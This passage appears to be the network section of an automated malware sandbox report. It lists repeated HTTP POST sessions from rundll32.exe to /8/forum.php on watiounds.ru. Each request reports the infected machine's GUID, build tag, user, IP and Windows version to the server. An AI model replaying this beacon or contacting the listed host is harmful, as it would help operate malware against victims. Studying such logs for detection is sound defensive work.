                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          340 | 192.168.2.22 | 49505 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:58.818528891 CEST | 416 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:58.943658113 CEST | 416 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          341 | 192.168.2.22 | 49506 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:59.257772923 CEST | 417 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:59.383683920 CEST | 417 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNQJMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          342 | 192.168.2.22 | 49507 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:59.711113930 CEST | 418 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:59.834989071 CEST | 418 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          343 | 192.168.2.22 | 49508 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:00.169342995 CEST | 419 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:00.297617912 CEST | 419 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          344 | 192.168.2.22 | 49509 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:00.624250889 CEST | 420 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:00.752571106 CEST | 420 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cATGZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          345 | 192.168.2.22 | 49510 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:01.062952042 CEST | 421 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:01.191457033 CEST | 421 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQNMJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          346 | 192.168.2.22 | 49511 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:01.523696899 CEST | 422 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:01.652654886 CEST | 423 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZTGAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          347 | 192.168.2.22 | 49512 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:01.975687981 CEST | 423 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.104321003 CEST | 424 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHFUSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          348 | 192.168.2.22 | 49513 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:02.422961950 CEST | 424 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.547758102 CEST | 425 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          349 | 192.168.2.22 | 49514 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:02.862381935 CEST | 426 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:02.993757963 CEST | 426 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          35 | 192.168.2.22 | 49200 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:39.177525997 CEST | 74 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:39.306526899 CEST | 75 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFYBUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          350 | 192.168.2.22 | 49515 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:03.302946091 CEST | 427 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:03.428528070 CEST | 427 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNYBMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          351 | 192.168.2.22 | 49516 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:03.745479107 CEST | 428 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:03.868875027 CEST | 428 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVFUEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          352 | 192.168.2.22 | 49517 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:04.190396070 CEST | 429 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:04.318844080 CEST | 429 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMAZNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          353 | 192.168.2.22 | 49518 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:04.638921976 CEST | 430 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:04.764005899 CEST | 430 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 46 55 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBFUYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          354 | 192.168.2.22 | 49519 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:05.100496054 CEST | 431 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:05.228657007 CEST | 432 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          355 | 192.168.2.22 | 49520 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:05.538383007 CEST | 432 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:05.665273905 CEST | 433 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZQJAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          356 | 192.168.2.22 | 49521 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:05.984097004 CEST | 433 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:06.107685089 CEST | 434 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          357 | 192.168.2.22 | 49522 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:06.445467949 CEST | 435 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
